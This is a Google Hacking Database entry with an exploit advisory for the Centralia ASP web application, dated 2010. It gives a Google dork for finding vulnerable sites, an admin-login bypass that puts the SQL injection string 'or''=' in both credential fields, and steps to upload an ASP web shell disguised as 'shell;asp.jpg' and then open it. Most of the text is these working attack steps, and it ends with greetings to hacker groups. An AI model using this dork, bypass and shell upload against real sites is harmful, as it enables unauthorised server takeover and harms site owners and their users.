inurl:showcat.asp?id=

GHDB-ID:

3647

Author:

anonymous

Google Dork Description:

inurl:showcat.asp?id=

========================================

Centralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability





========================================



#################################################################

# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability



 

# Date : 10 December 2010

 

# Author : ali.erroor

 

# Version : n/a

 

# Googel DorK : inurl:showcat.asp?id=

 

# Home : www.network-security.ir

 

# Email : ali.erroor@att.net

 



#################################################################

 

[+] Exploit

 

[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..





[-] http://localhost/path/admin/dbedit.asp?table=products

 

[-] username : 'or''='

[-] password : 'or''='





[2] Create New Upload Your Shell.Asp ..



[-] http://localhost/path/admin/dbedit.asp?a=upload_init



 

[3] To See Shell Edit Your uploads



[-] http://localhost/path/uploads/shell;asp.jpg

 

[+] Demo



[-] http://server/admin/dbedit.asp?table=products





[-] http://server/admin/dbedit.asp?a=upload_init







 

#################################################################

 

Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE 

/ Cair3x /novin security team and all iranian hackers



#################################################################